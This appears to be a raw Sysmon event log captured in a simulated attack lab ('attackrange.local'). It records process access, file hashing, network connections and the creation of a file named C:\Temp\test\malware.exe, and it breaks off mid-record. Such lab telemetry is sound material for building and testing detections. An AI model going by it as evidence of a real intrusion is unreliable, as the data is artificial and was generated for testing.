07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001046368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29336B42665E1812828449BD0979D3F,SHA256=542FD4C1872F07AC4BC31A4F4BD608191537862695CBA1495D7EBFB249A89F2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.642{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50921-false10.0.1.12-8000- 23542300x80000000000000001046384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:08.318{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55D7CA1200FC003969BE65994AA8D231,SHA256=C1383546989AC07ED4DC9D31A75A836CD3BFA81E2F2E08064FECCFF2D8336B0F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:06.355{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57166-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:09.333{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AF2A256E46592DFFB7CCA5A7631C0EB,SHA256=B7EA9060D211F55449D2F16B07FE2E2702CE91F4D87A31FBFE8ED34A669C13AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:09.003{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7981E6BA38121A9C1E6E902575E58E77,SHA256=39162DA94E4F07B33616B36DB3E9EF0F1876E148D929B1B48DBA2B6E485ACB47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.893{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57167-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001046387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:10.370{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=298DB3679A3B812BD96857325E8AE00C,SHA256=A6604A3ABD43926E16220E8B87C953E4A3EEE66A7C590E4BCABFDA9F200CDF4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:08.890{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-46236-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:10.347{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70816EC04134BACD210F87C78F0C3F93,SHA256=FEF34BDDBCE61CE239ACB94E890490879BC9DFFA8D76F4B994A6857AE0154EA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:10.347{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60F213CBCE119AC69B3470BE29E0C587,SHA256=6824BF9946B23ABEAC7534CC5F03A9F3956443CA35B4592C9AAD376231DC792D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:10.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C8AF27DD74190DA8C31CE192FBA569,SHA256=D7B36D2BC54D3AE354D8C45A5570CB461E23B1B1F098ACA00BA705A23D860919,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:11.684{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:11.384{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CA13D544DB8629083473229D7527018,SHA256=5B8EC953DAC27111379006AA352A4232D2D19B575160E3299DDEE99870C7192A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:11.066{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=527A28A3877FCD926EDAECD1182151B1,SHA256=0E8642461327F68CED13D25BAC231A3B25D4FC2D1726DFF770BB57580103E59E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:45:12.916{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\malware.exe2021-07-12 07:45:12.916 10341000x80000000000000001046396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.870{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001046395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.570{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\AlternateServices.txt2021-07-09 11:40:00.511 23542300x80000000000000001046394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.570{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\AlternateServices.txtMD5=437681975C3154D45D5D95B61D2F5B99,SHA256=491A570342F793C22823F7D5CD092CB3170E2F384187819DE7EADCC376CFCF46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.386{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DF8DDB0EE5E5FFA08D6F806C9C51305,SHA256=6EFD5766CFB26539EA99534E2DAA93C9F888B8D85C5C58E4DD444C996B6EAA7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:09.491{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57167-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:12.097{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=514A3884F1682A2D7C396C7B29B44648,SHA256=8EC19E7E881C53F029CD5B94BD960C1E69976D61D1EE0A61392A2E8592835DB6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.370{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001046391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.370{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=3E83EA0CB81B0B5FD20ABC9E0CBCDA53,SHA256=A0F05C51D45AE2D1CB3C3DAE7356534862F725095A3C2D51E89E8EADED34DE92,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:05.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50922-false10.0.1.12-8000- 23542300x80000000000000001046398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:13.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 